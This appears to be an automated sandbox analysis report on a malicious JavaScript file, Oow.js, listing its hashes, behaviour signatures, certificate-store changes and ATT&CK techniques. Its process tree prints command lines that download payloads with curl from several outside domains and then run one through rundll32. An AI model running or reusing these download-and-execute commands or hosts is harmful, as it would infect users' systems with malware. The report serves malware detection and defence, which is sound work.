d95c987423f2a2df57dccd6d9457804edddf58e28ba59cf22e8efc6beee7da09

Analysis

max time kernel
142s
max time network
122s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
22/12/2023, 15:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Oow.js
Size

111KB
MD5

181347abdbadb59298f2991f72622795
SHA1

7a7cde7fe72e6afc46d0fe557e2a4be26cea86f6
SHA256

000a5696c9efbd41eadef6758011c1eb13bcc18afa4393e2ac80b87e5807a308
SHA512

3423ab38140529f5a0bee96f9907de3245ad37db50d0fe4fec95c76c2971bb87b5c6802df6fb01e9adaefd61d5fe9b14c6458fb0e2085df9876c31b0d76ecadd
SSDEEP

3072:ObyPIRHE/jmBzAat20IiTm2m2dQJ5/uw82FIOiZ23X:WIaw0Tk856X

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	4264	wscript.exe
8	4264	wscript.exe
12	4264	wscript.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation	wscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2720	timeout.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B7AB3308D1EA4477BA1480125A6FBDA936490CBB	wscript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B7AB3308D1EA4477BA1480125A6FBDA936490CBB\Blob = 040000000100000010000000866912c070f1ecacacc2d5bca55ba1290f0000000100000020000000489ff6233f3d3c5da77604be230745657fe488cb05257da551bfd64c1f179e720b0000000100000052000000530053004c002e0063006f006d00200052006f006f0074002000430065007200740069006600690063006100740069006f006e00200041007500740068006f0072006900740079002000520053004100000009000000010000004c000000304a06082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b0601050507030862000000010000002000000085666a562ee0be5ce925c1d8890a6f76a87ec16d4d7d5f29ea7419cf20123b69140000000100000014000000dd040907a2f57a7d5253129295ee3880250da6591d00000001000000100000000d48ee33d7f1af8f4b002527f82a344a030000000100000014000000b7ab3308d1ea4477ba1480125a6fbda936490cbb190000000100000010000000787d09f953c59978ecd8d6e44b38e24f2000000001000000e1050000308205dd308203c5a00302010202087b2c9bd316803299300d06092a864886f70d01010b0500307c310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3131302f06035504030c2853534c2e636f6d20526f6f742043657274696669636174696f6e20417574686f7269747920525341301e170d3136303231323137333933395a170d3431303231323137333933395a307c310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3131302f06035504030c2853534c2e636f6d20526f6f742043657274696669636174696f6e20417574686f726974792052534130820222300d06092a864886f70d01010105000382020f003082020a0282020100f90fdda32b7dcbd02afeec6785a6e72e1bba77e1e3f5afa4ecfa4a5d91c457476b18776b76f2fd93e43d0fc2169e0b66c356949e178385ce56eff216fd0062f5220954e865174e41b9e04f4697aa1bc8b86e625e69b15fdb2a027efc6ccaf341d8edd0e8fc3f6148edb003141d100e4b19e0bb4eec8665ff36f35e67020b9d865561fd7a38edfee21900b76fa1506275743ca0fac82592b46e7a22c7f81ea1e3b2dd9131ab2b1d04ffa54a0437e985a4332bfde2d655347c19a44a68c7b2a8d3b7caa19388ebc197bc8cf91dd922842474c7043d6aa92993ccebb85be1fe5f25aa3458c8c123549d1b9811c3389c7e3d866ca50f40867c02f45c024f28cbae719f0f3ac833fe112535eafcbac5603dd97c18d5b2a9d37578037222ca3ac31fef2ce52ea9fa9e2cb65146fdaf03d6ea6068ea8516366b85e91ec0b3ddc424dc802a81416d943ec8e0c98141009e5ebf7fc50898a2182c4240b3f96f38274b4e80f43d8147e0887cea1cceb5755c512e1c2b7f1a7228e700b5d174c6d7e49fad0793b6533535fc37e4c3f65d16be2173de920af8a0636abc96926a3ef8bc65559bdef50d892604fc251aa62569cbc26dca7ce2595f97acebef2ec8bcd71b593c2bccf219c8936b276319cffce926f8ca719b7f93fe3467844e99ebfcb378093370ba66a676ed1b73eb1aa50dc422132094560a4e2c6c4eb1fdcf9c09baa233ed870203010001a3633061301d0603551d0e04160414dd040907a2f57a7d5253129295ee3880250da659300f0603551d130101ff040530030101ff301f0603551d23041830168014dd040907a2f57a7d5253129295ee3880250da659300e0603551d0f0101ff040403020186300d06092a864886f70d01010b050003820201002018119429fb269d1c1e1e7061f19572937124ad6893588e32af1bb37003fc252b7485903d786af4b98ba5973bb51891bb1ea7f9405b91f95599af1e11d05c1da766e3b194070c3239a6ea1bb079d81d9c7044e38addc4f9951f8a38433f0185a547a73d46b2bce52268f77b9cd82c3e0a21c82d33acbfc581993174c17571c5beb1f02345f49d6bfc19639da3bc04c6180b25bb53890fb38050de45ee447fab94786498d3f628dd87d8706574fb0eb913eba70f61a93296ccdebbed634c18bba940f7a0546e2088717518ea7ab43472e02327775cb690ea862540abef330fcb9f82bea220fbf6b52d1ae6c285b1740ffbc86502a4520147dd4922c1bfd8eb6bac7edeec633315b723088fc60f8d415add8ec5b98fe5453f78dbbad21b40b1fe714d3fe081a2ba5eb4ec15e093dd081f7ee155990b21de939e0afbe6a349bd3630fee777b2a07597b52d8188176520f7da90009fc952cc32ca357cf53d0fd82bd7f5266cc906349616ea70591a3279790bb6887f0f52483dbf6cd8a2442ed14eb77258d3891395fe44abf8d78b1b6e9cbc2ca05bd56a00af5f37e1d5fa100b989c86e7268fcef0ec6e8a570b80e34eb2c0a0636190ba556837746ab692db9fa18622b665270eecb69f4260e467c2b5da410bc4d38b611bbcfa1f912bd744075eba29acd9c5e9ef53485aeb80f1285821cdb00655fb273f539070a9041e5727b9	wscript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B7AB3308D1EA4477BA1480125A6FBDA936490CBB\Blob = 5c000000010000000400000000100000190000000100000010000000787d09f953c59978ecd8d6e44b38e24f030000000100000014000000b7ab3308d1ea4477ba1480125a6fbda936490cbb1d00000001000000100000000d48ee33d7f1af8f4b002527f82a344a140000000100000014000000dd040907a2f57a7d5253129295ee3880250da65962000000010000002000000085666a562ee0be5ce925c1d8890a6f76a87ec16d4d7d5f29ea7419cf20123b6909000000010000004c000000304a06082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080b0000000100000052000000530053004c002e0063006f006d00200052006f006f0074002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900200052005300410000000f0000000100000020000000489ff6233f3d3c5da77604be230745657fe488cb05257da551bfd64c1f179e72040000000100000010000000866912c070f1ecacacc2d5bca55ba1292000000001000000e1050000308205dd308203c5a00302010202087b2c9bd316803299300d06092a864886f70d01010b0500307c310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3131302f06035504030c2853534c2e636f6d20526f6f742043657274696669636174696f6e20417574686f7269747920525341301e170d3136303231323137333933395a170d3431303231323137333933395a307c310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3131302f06035504030c2853534c2e636f6d20526f6f742043657274696669636174696f6e20417574686f726974792052534130820222300d06092a864886f70d01010105000382020f003082020a0282020100f90fdda32b7dcbd02afeec6785a6e72e1bba77e1e3f5afa4ecfa4a5d91c457476b18776b76f2fd93e43d0fc2169e0b66c356949e178385ce56eff216fd0062f5220954e865174e41b9e04f4697aa1bc8b86e625e69b15fdb2a027efc6ccaf341d8edd0e8fc3f6148edb003141d100e4b19e0bb4eec8665ff36f35e67020b9d865561fd7a38edfee21900b76fa1506275743ca0fac82592b46e7a22c7f81ea1e3b2dd9131ab2b1d04ffa54a0437e985a4332bfde2d655347c19a44a68c7b2a8d3b7caa19388ebc197bc8cf91dd922842474c7043d6aa92993ccebb85be1fe5f25aa3458c8c123549d1b9811c3389c7e3d866ca50f40867c02f45c024f28cbae719f0f3ac833fe112535eafcbac5603dd97c18d5b2a9d37578037222ca3ac31fef2ce52ea9fa9e2cb65146fdaf03d6ea6068ea8516366b85e91ec0b3ddc424dc802a81416d943ec8e0c98141009e5ebf7fc50898a2182c4240b3f96f38274b4e80f43d8147e0887cea1cceb5755c512e1c2b7f1a7228e700b5d174c6d7e49fad0793b6533535fc37e4c3f65d16be2173de920af8a0636abc96926a3ef8bc65559bdef50d892604fc251aa62569cbc26dca7ce2595f97acebef2ec8bcd71b593c2bccf219c8936b276319cffce926f8ca719b7f93fe3467844e99ebfcb378093370ba66a676ed1b73eb1aa50dc422132094560a4e2c6c4eb1fdcf9c09baa233ed870203010001a3633061301d0603551d0e04160414dd040907a2f57a7d5253129295ee3880250da659300f0603551d130101ff040530030101ff301f0603551d23041830168014dd040907a2f57a7d5253129295ee3880250da659300e0603551d0f0101ff040403020186300d06092a864886f70d01010b050003820201002018119429fb269d1c1e1e7061f19572937124ad6893588e32af1bb37003fc252b7485903d786af4b98ba5973bb51891bb1ea7f9405b91f95599af1e11d05c1da766e3b194070c3239a6ea1bb079d81d9c7044e38addc4f9951f8a38433f0185a547a73d46b2bce52268f77b9cd82c3e0a21c82d33acbfc581993174c17571c5beb1f02345f49d6bfc19639da3bc04c6180b25bb53890fb38050de45ee447fab94786498d3f628dd87d8706574fb0eb913eba70f61a93296ccdebbed634c18bba940f7a0546e2088717518ea7ab43472e02327775cb690ea862540abef330fcb9f82bea220fbf6b52d1ae6c285b1740ffbc86502a4520147dd4922c1bfd8eb6bac7edeec633315b723088fc60f8d415add8ec5b98fe5453f78dbbad21b40b1fe714d3fe081a2ba5eb4ec15e093dd081f7ee155990b21de939e0afbe6a349bd3630fee777b2a07597b52d8188176520f7da90009fc952cc32ca357cf53d0fd82bd7f5266cc906349616ea70591a3279790bb6887f0f52483dbf6cd8a2442ed14eb77258d3891395fe44abf8d78b1b6e9cbc2ca05bd56a00af5f37e1d5fa100b989c86e7268fcef0ec6e8a570b80e34eb2c0a0636190ba556837746ab692db9fa18622b665270eecb69f4260e467c2b5da410bc4d38b611bbcfa1f912bd744075eba29acd9c5e9ef53485aeb80f1285821cdb00655fb273f539070a9041e5727b9	wscript.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 4264 wrote to memory of 5072	4264	wscript.exe	90
PID 4264 wrote to memory of 5072	4264	wscript.exe	90
PID 4264 wrote to memory of 4132	4264	wscript.exe	91
PID 4264 wrote to memory of 4132	4264	wscript.exe	91
PID 4264 wrote to memory of 2788	4264	wscript.exe	94
PID 4264 wrote to memory of 2788	4264	wscript.exe	94
PID 4264 wrote to memory of 4748	4264	wscript.exe	96
PID 4264 wrote to memory of 4748	4264	wscript.exe	96
PID 4264 wrote to memory of 2608	4264	wscript.exe	98
PID 4264 wrote to memory of 2608	4264	wscript.exe	98
PID 4264 wrote to memory of 2708	4264	wscript.exe	99
PID 4264 wrote to memory of 2708	4264	wscript.exe	99
PID 4264 wrote to memory of 1084	4264	wscript.exe	102
PID 4264 wrote to memory of 1084	4264	wscript.exe	102
PID 4264 wrote to memory of 940	4264	wscript.exe	104
PID 4264 wrote to memory of 940	4264	wscript.exe	104
PID 4132 wrote to memory of 2472	4132	cmd.exe	106
PID 4132 wrote to memory of 2472	4132	cmd.exe	106
PID 5072 wrote to memory of 3356	5072	cmd.exe	107
PID 5072 wrote to memory of 3356	5072	cmd.exe	107
PID 2788 wrote to memory of 516	2788	cmd.exe	108
PID 2788 wrote to memory of 516	2788	cmd.exe	108
PID 2708 wrote to memory of 1548	2708	cmd.exe	109
PID 2708 wrote to memory of 1548	2708	cmd.exe	109
PID 2608 wrote to memory of 4064	2608	cmd.exe	110
PID 2608 wrote to memory of 4064	2608	cmd.exe	110
PID 4748 wrote to memory of 1020	4748	cmd.exe	111
PID 4748 wrote to memory of 1020	4748	cmd.exe	111
PID 940 wrote to memory of 2720	940	cmd.exe	112
PID 940 wrote to memory of 2720	940	cmd.exe	112
PID 1084 wrote to memory of 1576	1084	cmd.exe	113
PID 1084 wrote to memory of 1576	1084	cmd.exe	113
PID 940 wrote to memory of 3620	940	cmd.exe	116
PID 940 wrote to memory of 3620	940	cmd.exe	116

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Oow.js
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4264
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Tkfogibkofb\Copfkviglx & curl https://doorbell.api.net.bd/j2l1/0.5887307268011439.dat --output C:\Tkfogibkofb\Copfkviglx\Nkfskfkvosfjg.OOOOCCCCXXXX
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5072
- - C:\Windows\system32\curl.exe
    curl https://doorbell.api.net.bd/j2l1/0.5887307268011439.dat --output C:\Tkfogibkofb\Copfkviglx\Nkfskfkvosfjg.OOOOCCCCXXXX
    3⤵
    PID:3356
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Tkfogibkofb\Copfkviglx & curl https://fineclippingpath.com/zD6AAu/0.9217936085757838.dat --output C:\Tkfogibkofb\Copfkviglx\Nkfskfkvosfjg.OOOOCCCCXXXX
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4132
- - C:\Windows\system32\curl.exe
    curl https://fineclippingpath.com/zD6AAu/0.9217936085757838.dat --output C:\Tkfogibkofb\Copfkviglx\Nkfskfkvosfjg.OOOOCCCCXXXX
    3⤵
    PID:2472
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Tkfogibkofb\Copfkviglx & curl https://expressreparation.com/cBB/0.6030763089045645.dat --output C:\Tkfogibkofb\Copfkviglx\Nkfskfkvosfjg.OOOOCCCCXXXX
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2788
- - C:\Windows\system32\curl.exe
    curl https://expressreparation.com/cBB/0.6030763089045645.dat --output C:\Tkfogibkofb\Copfkviglx\Nkfskfkvosfjg.OOOOCCCCXXXX
    3⤵
    PID:516
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Tkfogibkofb\Copfkviglx & curl https://sakshiconstructioncompany.com/bc1WDy2/0.563747157449501.dat --output C:\Tkfogibkofb\Copfkviglx\Nkfskfkvosfjg.OOOOCCCCXXXX
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4748
- - C:\Windows\system32\curl.exe
    curl https://sakshiconstructioncompany.com/bc1WDy2/0.563747157449501.dat --output C:\Tkfogibkofb\Copfkviglx\Nkfskfkvosfjg.OOOOCCCCXXXX
    3⤵
    PID:1020
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Tkfogibkofb\Copfkviglx & curl https://po-iq.org/l8BFIV6/0.4840008653380404.dat --output C:\Tkfogibkofb\Copfkviglx\Nkfskfkvosfjg.OOOOCCCCXXXX
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2608
- - C:\Windows\system32\curl.exe
    curl https://po-iq.org/l8BFIV6/0.4840008653380404.dat --output C:\Tkfogibkofb\Copfkviglx\Nkfskfkvosfjg.OOOOCCCCXXXX
    3⤵
    PID:4064
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Tkfogibkofb\Copfkviglx & curl 0.6667661416424608.dat --output C:\Tkfogibkofb\Copfkviglx\Nkfskfkvosfjg.OOOOCCCCXXXX
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2708
- - C:\Windows\system32\curl.exe
    curl 0.6667661416424608.dat --output C:\Tkfogibkofb\Copfkviglx\Nkfskfkvosfjg.OOOOCCCCXXXX
    3⤵
    PID:1548
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Tkfogibkofb\Copfkviglx & curl 0.9463666944093985.dat --output C:\Tkfogibkofb\Copfkviglx\Nkfskfkvosfjg.OOOOCCCCXXXX
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1084
- - C:\Windows\system32\curl.exe
    curl 0.9463666944093985.dat --output C:\Tkfogibkofb\Copfkviglx\Nkfskfkvosfjg.OOOOCCCCXXXX
    3⤵
    PID:1576
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c timeout 10 & rundll32 C:\Tkfogibkofb\Copfkviglx\Nkfskfkvosfjg.OOOOCCCCXXXX,Enter
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:940
- - C:\Windows\system32\timeout.exe
    timeout 10
    3⤵
    - Delays execution with timeout.exe
    PID:2720
- - C:\Windows\system32\rundll32.exe
    rundll32 C:\Tkfogibkofb\Copfkviglx\Nkfskfkvosfjg.OOOOCCCCXXXX,Enter
    3⤵
    PID:3620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Windows 7 deprecation

Loading Replay Monitor...